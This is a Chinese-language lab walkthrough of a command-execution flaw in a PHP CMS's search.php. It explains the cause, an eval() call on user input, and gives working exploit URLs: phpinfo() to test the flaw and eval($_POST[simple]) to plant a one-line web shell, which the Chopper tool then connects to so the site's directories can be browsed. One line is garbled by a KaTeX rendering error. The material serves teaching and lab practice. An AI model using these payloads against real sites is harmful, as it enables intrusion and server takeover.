命令执行的形成原理:
1)当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。
2)脚本语言(如PHP)优点是简洁、方便,但也伴随着一些问题,如速度慢、无法接触系统底层,如果我们开发的应用(特别是企业级的一些应用)需要一些除去WEB的特殊功能时,就需要调用一些外部程序。
3)在PHP中可以调用外部程序的常见函数:system、exec、shell_exec、passthru、popen、proc_popen,应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,又没有过滤用户的输入的情况下,就会造成命令执行漏洞。
步骤如下:
1.1访问http://192.168.1.3/sea,访问网站首页,如图1所示
图1
1.2在网站的高级搜索中有一个0day漏洞,命令执行。在search.php中存在一个eval()函数。
for($m=0;$m<$arlen;$m++){
$strIf=$iar[1][$m];
$strIf=$this->parseStrIf($strIf);
$strThen=$iar[2][$m];
$strThen=$this->parseSubIf($strThen);
if (strpos($strThen,$labelRule2)===false){
if (strpos($strThen,$labelRule3)>=0){
$elsearray=explode($labelRule3,$strThen);
$strThen1=$elsearray[0];
$strElse1=$elsearray[1];
@eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");
if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);} else {$content=str_replace($iar[0][$m],$strElse1,$content);}
}else{
@eval("if(".$strIf.") { \$ifFlag=true;} else{ \$ifFlag=false;}");
if ($ifFlag)$content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);}
}
使用exp:/search.php?searchtype=5&tid=&area=phpinfo()测试网站漏洞。
访问http://192.168.1.3/sea/search.php?searchtype=5&tid=&area=phpinfo(),网站有漏洞,输入命令之后,命令执行成功。如图2所示
图2
1.3由上图可知使用exp:/search.php?searchtype=5&tid=&area=eval(KaTeX parse error: Expected 'EOF', got '&' at position 92: …hp?searchtype=5&̲tid=&area=eval(_POST[simple]),此时构造一句话小马成功,小马密码为simple,如图3所示:
图3
1.4网页浏览小马,执行成功之后,使用菜刀连接已构造的一句话,双击打开菜刀,鼠标右击,点击“添加”,如图4、图5所示:
图4
图5
1.5在地址栏中填写上一步构造一句话的地址: http://192.168.1.3/sea/search.php?searchtype=5&tid=&area=eval($_POST[simple]),在标记2的地方填写一句话密码:simple,在最后脚本类型中选择PHP,最后点击“编辑”,如图6所示:
图6
1.6发现能遍历网站目录getshell成功。如图7所示
图7